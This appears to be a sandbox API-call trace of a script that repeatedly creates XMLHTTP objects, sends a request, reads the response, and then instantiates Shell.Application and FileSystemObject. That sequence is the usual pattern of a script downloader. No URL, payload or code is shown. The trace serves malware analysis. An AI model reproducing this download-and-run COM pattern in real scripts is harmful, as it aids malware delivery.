	[0246.220] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0246.220] SysStringLen (param_1=0x0) returned 0x0
	[0246.220] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0246.220] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0246.220] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0246.220] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0246.220] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0246.220] ??2@YAPEAX_K@Z () returned 0x62f310
	[0246.220] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0246.220] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0246.220] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0246.220] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0246.220] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0246.220] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0246.220] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0246.220] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0246.221] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0246.221] SysStringLen (param_1=0x0) returned 0x0
	[0246.221] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0246.221] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0246.221] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0246.221] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0246.221] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0246.221] ??2@YAPEAX_K@Z () returned 0x62f330
	[0246.221] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0246.221] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0246.221] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0246.221] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0246.221] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0246.221] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0246.221] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0246.221] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0246.221] longjmp () 
	[0246.221] longjmp () 
	[0246.221] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0246.221] SysStringLen (param_1=0x0) returned 0x0
	[0246.221] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0246.222] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0246.222] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0246.222] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0246.222] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0246.222] ??2@YAPEAX_K@Z () returned 0x62f310
	[0246.222] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0246.222] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0246.222] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0246.222] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0246.222] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0246.222] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0246.222] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0246.222] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0246.222] longjmp () 
	[0246.222] longjmp () 
	[0246.222] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0246.222] SysStringLen (param_1=0x0) returned 0x0
	[0246.222] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0246.222] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0246.222] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0246.223] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0246.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0246.223] ??2@YAPEAX_K@Z () returned 0x62f330
	[0246.223] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0246.223] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0246.223] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0246.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0246.223] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0246.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0246.223] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0246.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0246.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0246.223] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0246.223] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0246.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0246.614] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0246.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0246.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0246.615] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0246.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0246.615] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0246.615] SysStringLen (param_1=0x0) returned 0x0
	[0246.615] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0246.615] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0246.615] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0246.615] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0246.615] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0246.615] ??2@YAPEAX_K@Z () returned 0x62f350
	[0246.615] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0246.615] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0246.615] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0246.615] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0246.615] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0246.616] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0246.616] SysStringLen (param_1=0x0) returned 0x0
	[0246.616] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0246.619] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0246.619] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0246.619] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0246.619] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0246.619] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0246.619] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0247.347] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0247.347] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
